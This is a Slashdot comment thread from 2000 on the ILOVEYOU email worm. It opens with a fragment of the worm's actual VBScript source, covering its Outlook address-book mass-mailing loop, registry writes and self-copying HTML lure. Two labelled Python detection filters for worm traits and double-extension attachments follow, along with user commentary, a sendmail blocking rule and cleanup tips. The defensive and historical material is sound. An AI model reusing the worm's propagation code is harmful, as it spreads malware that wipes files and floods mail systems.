male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"

This HTML file need ActiveX Control

To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+ch r(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+c hr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+ch r(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
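Added example, not part of the post above or of the original page: a static triage pass a mail or desktop administrator could run over a quarantined .vbs attachment to flag the behaviours visible in the listing (self-copy, autorun registry keys, Outlook address-book mailing, file overwriting). The rule names, the `scan` and `assess` functions and both sample inputs are assumptions made for this illustration; the suspect sample reuses a few statements quoted from the listing, and the matching ignores whitespace so that spaces injected by a web page do not hide a hit.

```python
import re

# Each rule is matched per line after removing all whitespace and lowercasing,
# so spaces injected by a web page or mail gateway do not hide a match.
RULES = {
    "reads-own-source": re.compile(r"opentextfile\(wscript\.scriptfullname"),
    "copies-self": re.compile(r"getfile\(wscript\.scriptfullname\)"),
    "autorun-key": re.compile(r"\\currentversion\\run(services)?\\"),
    "outlook-automation": re.compile(r'createobject\("outlook\.application"\)'),
    "walks-address-book": re.compile(r"\.addresslists"),
    "adds-attachment": re.compile(r"\.attachments\.add"),
    "overwrites-file": re.compile(r"opentextfile\([^)]*,2,true\)"),
}
SELF_COPY = {"reads-own-source", "copies-self"}
MAILER = {"outlook-automation", "walks-address-book", "adds-attachment"}


def scan(script_text):
    """Return {behaviour: [line numbers]} for every rule that matches."""
    hits = {}
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if line.strip().lower().startswith(("rem ", "'")):
            continue  # VBScript comment, not executable text
        norm = re.sub(r"\s+", "", line).lower()
        for name, rule in RULES.items():
            if rule.search(norm):
                hits.setdefault(name, []).append(lineno)
    return hits


def assess(script_text):
    """Combine the individual hits into a triage verdict."""
    hits = scan(script_text)
    found = set(hits)
    if found & SELF_COPY and MAILER <= found:
        return "self-mailing worm traits", hits
    if found:
        return "review", hits
    return "no match", hits


# Constructed test input: individual statements quoted from the listing above.
SAMPLE_SUSPECT = r"""rem constructed test input, statements quoted from the listing
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32",dirsystem&"\ MSKernel32.vbs"
set out=WScript.CreateObject("Outlook.Application")
for ctrlists=1 to mapi.AddressLists.Count
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
set ap=fso.OpenTextFile(f1.path,2,true)"""

# Constructed benign logon script: appends to a log (mode 8), touches no mail API.
SAMPLE_BENIGN = r"""' constructed benign logon script
Set fso = CreateObject("Scripting.FileSystemObject")
Set log = fso.OpenTextFile("C:\Temp\logon.log", 8, True)
log.WriteLine Now & " logon"
log.Close"""

if __name__ == "__main__":
    for label, text in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        verdict, hits = assess(text)
        print(label, "->", verdict)
        for name, lines in sorted(hits.items()):
            print("   ", name, "at line(s)", lines)
```

A script that only touches an autorun key, or only overwrites a file, lands in "review" rather than being treated as a worm; the top verdict needs both the self-copy and the full mailing pattern.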

Stopping email viruses. (1)

Znork (31774) | more than 14 years ago | (#1092612)

These kinds of viruses will continue to proliferate and cause massive disruptions and cost huge amounts of money until several large corporations get together and sue Microsoft (or other mail program manufacturers) for negligence and demand the companies selling the faulty programs pay for the costs.

The dangers of allowing running of attached programs automatically or even easily is guaranteed to cause just this problem. It will happen. It will be repeated. On a yearly basis now, perhaps, but more likely on a monthly or weekly basis in the future. The _only_ way to stop it from happening is to stop the mail program creators from _having_ these 'features'.

Linux version (2)

hoss10 (108367) | more than 14 years ago | (#1092613)

> Pine/Elm/Mutt users as always laugh maniacally
Stop being so arrogant. It's just an executable attachment.

For a linux version just write a bash script that'll read the users address book and send it on as well.

This is one reason NOT to want world domination. In that case it'll spread easily

------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -

Re:OPening e-mail attachments (2)

slim (1652) | more than 14 years ago | (#1092614)

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.

Now *that* is crappy design...
--

Re:Pretty Nasty actually (1)

scrutty (24640) | more than 14 years ago | (#1092615)

I'm just reporting what our NT admins were saying. I don't know anything about Windows really. It was still pretty amazing watching how fast it spread itself

Xerox getting mauled ... (1)

BadERA (107121) | more than 14 years ago | (#1092616)

Here at Xerox we're getting pounded ... people are such IDIOTS!

Remember to blame Microsoft! (1)

dmorin (25609) | more than 14 years ago | (#1092617)

For every story you see, for every person that warns you, remember to explain nicely and calmly to them that these things wouldn't happen if Microsoft didn't have an operating systems monopoly. Seriously. People can believe all the MS propaganda and FUD they want, but if you can show them how MS is directly responsible for them getting a virus, maybe that they'll understand.

-d, laughing with the rest of the Linux users

Heise has it covered (1)

laron (102608) | more than 14 years ago | (#1092618)

http://www.heise.de [heise.de] Site is in German, You may want to use this little fish [digital.com]

It's just E-mail replication... (1)

Stonehand (71085) | more than 14 years ago | (#1092619)

"Who needs Outlook, when Outlook can be broken?"

{ducks}

Hrm. How many kids have ever been famous (as youngsters), historically? And would worms be reduced if the actors were *never* mentioned in press, and were basically guaranteed no fame except perhaps in their local justice system?

Re:Total Cost of ownership if Outlook/Exchange (1)

sTeF (8952) | more than 14 years ago | (#1092620)

sorry made a few mistakes:
s/window/windows/
but most^H^H^H^Hnobody is that stupid

Microsoft Announcement (3)

Sargent1 (124354) | more than 14 years ago | (#1092621)

Early this morning, in response to the virus, the AP had the following report about Microsoft:

--

SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"

"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."

"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."

--

Sargent

Re:Solution for Postfix (5)

otmar (32000) | more than 14 years ago | (#1092622)

Sendmail can filter that crap as well, just add

HSubject: $>local_check_header_subject
D{loveletterMessage}"553 Your message may contain a worm."
Slocal_check_header_subject
RILOVEYOU $#error $: ${loveletterMessage}

to your sendmail.cf (version > 8.9 !).

(there is a tab between the ILOVEYOU and $#error.)

/ol (credits go to a cow-orker, though)

Thanks lords, I don't use windows (1)

f5426 (144654) | more than 14 years ago | (#1092623)

One of my coworkers just walked in my office, saying 'what are .vbs documents' ?

So I looked at it, seeing the obvious VB virus in it.

Thankfully, the OS this guy uses is OPENSTEP42. Two minutes later, I received it (via gnustep discussion list). Happily, I run Mac OS X Server.

Cheers,

--fred

Re:E-mail too versatile? (2)

ptomblin (1378) | more than 14 years ago | (#1092624)

The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
--
A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.

Warning! Warning! (1)

B. Samedi (48894) | more than 14 years ago | (#1092625)

I can't wait to see traditional media respond to this. "A horrible virus from that insidious Internet thing is out there looking for your children! Details later after some other inane news."

A new Outlook? (1)

Ho-Lee-Cow! (173978) | more than 14 years ago | (#1092626)

This is an Outlook trojan. Shocker.

I'm sure M$ will deny that it even exists, talk about dark hearted hackers...then not bother to fix the bug...I'm sorry, feature that allows it to do this.

SO glad I use Eudora and Pine.

Re:Bad Worm. (2)

BrianW (180468) | more than 14 years ago | (#1092627)

What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.

I think it's seen as being an easy way evil hackers can get at your machine, especially as people (and the media) don't seem to realise that the user has to open the email - it doesn't happen automatically. And, as an automatic it-comes-from-cyberspace-to-take-over-your-machine virus sounds sufficiently scary, it gets lots of media coverage.

Funniest thing I've read in years! (4)

ToLu the Happy Furby (63586) | more than 14 years ago | (#1092628)

From the MSNBC article [msnbc.com] :

"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."

Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.

"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected."
(emphasis mine)

The article even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".

Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-X11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??

I mean, I'm joking of course.

Or at least I think I'm joking...

Re:This hit where I work. (2)

GC (19160) | more than 14 years ago | (#1092629)

A lot of users will just see LOVE-LETTER-FOR... especially in outlook. For me - it was the icon that gave it away.

disappointed (2)

Duxup (72775) | more than 14 years ago | (#1092630)

My office got it this morning.
Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.

Nasty SOB (1)

CvD (94050) | more than 14 years ago | (#1092631)

It doesn't only send itself via email to everyone on your list, it also (if you use mIRC) sends it to others using DCC. It wipes out files with the following extensions: MP3, MP2, CSS, HTML, JPG, JPEG, JSE, WSH, JS, SCT, HTA, and VBS (may have forgotten some). It'll muck about in your registry. It's not only in the UK... it's sweeping across the continent as people are logging in and reading their email. Apparently it originated from Manila, the Philippines (or so it says in the script itself), but this may be someone who is making someone else look bad (the email address in the script says: ispyder@mail.com). It also tries to download an executable (1 of 4 different, random executables). It changes IE's Start Page.

This is someone with a serious grudge against people who use Microsoft mail programs. :-) ... Makes me all the more happy I don't use Windows.

There's a VBS script I saw to fix most of the damage in the registry, but it looks like the site I got it from has been slashdotted, and I don't have the necessary bandwidth to mirror it (or the original script, which I have too). Email me if you do.

Cheers!

Costyn.

Darwinism again (1)

caffeinated_bunsen (179721) | more than 14 years ago | (#1092632)

This is just natural selection in action. People smart enough to use anything but Windoze aren't affected by it, except for mailbox clutter. People who avoid contact with Outlook users aren't affected by it. People who use Windoze and Outlook but are smart enough not to put anything in the hackable-as-hell address book aren't propagating it. People who don't open e-mail attachments without a thought aren't propagating it. Those who have sold their souls (and systems) to Microsoft get screwed by it. Now who can tell me what the moral of this story is?

What a Maron (2)

Zachary Kessin (1372) | more than 14 years ago | (#1092633)

The guy put his email at the top of the virus

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

The Cure of the ills of Democracy is more Democracy.

mail server filters (2)

crow (16139) | more than 14 years ago | (#1092634)

I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.

That should be the standard approach at any site that runs Windows.
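Added example, not part of the comments above or of the original page: a gateway-side check in the spirit of the sendmail subject rule and the attachment-purging filter described in this thread. It matches the attachment name (script extension, and a decoy extension in front of it as in LOVE-LETTER-FOR-YOU.TXT.vbs) as well as the subject line. The extension lists, function names, addresses and sample messages are assumptions constructed for this illustration.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions Windows will execute or hand to Windows Script Host on double-click.
EXEC_EXTS = {"vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta",
             "exe", "scr", "pif", "bat", "cmd", "com"}
# Extensions a user reads as a harmless document when they appear first.
DECOY_EXTS = {"txt", "doc", "jpg", "jpeg", "gif", "pdf", "mp3", "htm", "html"}
BLOCKED_SUBJECTS = {"ILOVEYOU"}


def classify_filename(name):
    """Return a finding label for an attachment name, or None if it looks fine."""
    parts = name.lower().rstrip(". ").split(".")
    if len(parts) < 2 or parts[-1] not in EXEC_EXTS:
        return None
    if len(parts) >= 3 and parts[-2] in DECOY_EXTS:
        return "double-extension"
    return "executable-attachment"


def inspect_message(raw_bytes):
    """Parse a raw RFC 822 message and list (finding, value) pairs."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    subject = str(msg["Subject"] or "").strip()
    if subject.upper() in BLOCKED_SUBJECTS:
        findings.append(("subject", subject))
    for part in msg.walk():
        filename = part.get_filename()
        if filename:
            label = classify_filename(filename)
            if label:
                findings.append((label, filename))
    return findings


def verdict(raw_bytes):
    """reject on a risky attachment, quarantine on subject alone, else accept."""
    findings = inspect_message(raw_bytes)
    kinds = {kind for kind, _ in findings}
    if kinds & {"double-extension", "executable-attachment"}:
        return "reject", findings
    if findings:
        return "quarantine", findings
    return "accept", findings


def build_sample(subject, filename=None):
    """Constructed test message; the attachment body is an inert placeholder."""
    m = EmailMessage()
    m["From"] = "alice@example.com"
    m["To"] = "bob@example.com"
    m["Subject"] = subject
    m.set_content("kindly check the attached LOVELETTER coming from me.")
    if filename:
        m.add_attachment(b"rem inert placeholder\r\n", maintype="application",
                         subtype="octet-stream", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    samples = [
        ("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
        ("meeting notes", "notes.TXT.vbs"),
        ("ILOVEYOU", None),
        ("meeting notes", "notes.txt"),
    ]
    for subject, filename in samples:
        print(subject, filename, "->", verdict(build_sample(subject, filename)))
```

The second sample is the case a subject-only rule lets through: the subject is ordinary, and the filename check alone produces the reject.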

Re:OPening e-mail attachments (2)

weloytty (53582) | more than 14 years ago | (#1092635)

Not true.

The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.

Of course, your typical unix user probably wouldn't run such a file, but that isn't an application design issue.

Re:Pretty Nasty actually (1)

TopShelf (92521) | more than 14 years ago | (#1092636)

I use the preview pane, and it hasn't launched from my mailbox. I immediately set up a rule to permanently delete these emails upon receipt, but our office (in Indianapolis) is flooded with this crap.

Re:Maybe this can get companies to consider UNIX? (2)

sterwill (972) | more than 14 years ago | (#1092637)

Sendmail is an MTA, not an MUA. I don't see how Sendmail (or any of the better mailers like postfix or qmail) would ever have this problem.

--

when she received 5 copies ? (1)

hoss10 (108367) | more than 14 years ago | (#1092638)

I got suspicious after 1 copy!

1) It's an executable attachment (.vbs - Doh!)
2) It came from a complete stranger

no.1 was enough though

I was too curious though - had to have a look with Notepad ;)

------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -

Re:Maybe this can get companies to consider UNIX? (1)

jaf (121858) | more than 14 years ago | (#1092639)

> Windows is not the problem - Outlook is.

Windows is also the problem - this virus not only reproduces - it also deletes files, changes startup setting for the computer. Those system changes would not be allowed on any normal UNIX system.

Re:OPening e-mail attachments (1)

holdp (24965) | more than 14 years ago | (#1092640)

You mean some people opened this thing? With such a title it's clearly advertising at best.

The lovechild effect (1)

DavidpFitz (136265) | more than 14 years ago | (#1092641)

This morning alone, I've got 9 warning messages from people, each of which were cc:'d to about 50 others. That makes 450 messages, and think of all the times that someone forwarded it on.

So, while I'm feeling all clever running Solaris and not Windows, POP servers everywhere are getting a sort of lovechild effect and getting a second battering!

Wouldn't you think that by now the media would have mentioned something about the evils of VB?

Re:Looks a bit like Melisa (1)

aozilla (133143) | more than 14 years ago | (#1092642)

I hope it is... if not poor ispyder@mail.com is probably getting tons of hate mail right now. from the same people dumb enough to click on the attachment in the first place.

Re:Remember to blame Microsoft! (2)

Zagato-sama (79044) | more than 14 years ago | (#1092643)

So let me get this right, Microsoft directly e-mails the virus to you, then goes over to your computer and forcibly opens the attachment? Wow! In that case, can they come over and cook me dinner while they're at it? I'd like roast linux fool, medium rare.

my office was hit (1)

Numeric (22250) | more than 14 years ago | (#1092644)

Luckily, I came into the office late today and everyone here is scrambling to "repair" their system.

Re:Outlook Strikes Again. (1)

stx23 (14942) | more than 14 years ago | (#1092645)

From my initial investigation it looks like it is totally MS Specific.
Yup.
So own up then how many /. readers have been kicked in the balls?
Not here. I have turned off active scripting, and if there is active content (as in this payload method), I would get a message asking if I want to run it.
However, I'm in the minority. If you care about the security of your machine, you should turn off scripting, and given the attack of Melissa last year, you should be fully aware of the potential risk involved.
This is only going to get worse.

Re:Total Cost of ownership if Outlook/Exchange (5)

Malachi (5716) | more than 14 years ago | (#1092646)

I think we need to see some responsibility on M$'s part to add some checks and balances to their open ended VB scripted Outlook. While we too got hit by a Melissa like virus last month the Unix group just chuckled as the windows chickens ran about trying to stop the fire from spreading, or sending more spam by trying to tell people to not check it.

Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formatting virii? Talk about large scale data loss.

-Malachi-

Re:Analysis (1)

biglig2 (89374) | more than 14 years ago | (#1092647)

Not just local drives. It also works on any network drive mappings you have. Ah, the joy of being a sysadmin in the UK and having to run cleans on the mail system in the US while their sysadmins sleep happy sleep...

Whole companies are down (1)

Wizard of OS (111213) | more than 14 years ago | (#1092648)

The company I work for (BaaN [baan.com] ) suffered from the trojan as well. The email network is down (Exchange) as I type. The problem here: everybody uses one shared addressbook with over 4000 (!!) mail addresses. You can imagine what happens if the trojan gets hold of this ...

Most of the correspondence goes through email around here (because we have departments all over the world) so you can imagine the damage.

And people ask me why I always ssh to my server to start pine .... *grin*

Slashdot effect (1)

biglig2 (89374) | more than 14 years ago | (#1092649)

You can talk all you like about sites being slashdotted, but just try connecting to http://www.skyinet.net/ ;-)

Re:Linux version (2)

John Fulmer (5840) | more than 14 years ago | (#1092650)

> Stop being so arrogant. It's just an executable
> attachment.

Er, yes, but Pine/Elm/Mutt etc, do not run attachments automatically, don't include a programming language within the application itself, and aren't really susceptible to this sort of thing.

Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, received in e-mail. You certainly wouldn't get this kind of instant mass destruction.

jf
(Laughing manically!)

Re:Total Cost of ownership if Outlook/Exchange (2)

smartin (942) | more than 14 years ago | (#1092651)

Sure I do. I just get the benefit of choosing which calendar I want to use. These things should all be standards based.

quick fix (1)

iyii (173214) | more than 14 years ago | (#1092652)

To get rid of macro virus "ILOVEYOU". This only works if you haven't gotten to get that bugfix file that set the default IE page.
Go to start menu, find files or folders, make sure checkbox for include subfolders is checked, look for *.vbs.
Once search is complete highlight all files (shift-downarrow), then hit shift-del, say yes to all if prompted.
Go to settings, control panel, internet options, set homepage to use blank.
Shutdown and reboot.
It also tries to dcc an executable if you have mirc.

My company was eat up with this damn thing... (1)

ACK!! (10229) | more than 14 years ago | (#1092653)

Listen, how many email virus outbreaks will it take before people get the clue. If you get five emails with the same subject from people who do NOT love you then don't open the crap it is a virus or useless spam!

It is amazing that someone sits around and takes the time to start this nonsense anyway. God, I hate Outlook and Neanderthal technology it runs on. Still, driving innocent sysadmins insane is not the answer people.

Re:What's love got to do with it? (1)

Guzz (46637) | more than 14 years ago | (#1092654)

This is more than just graffiti. It took down our exchange server at 9:45 this morning. This downtime is costing us a lot of money.

--god, i hate windows.
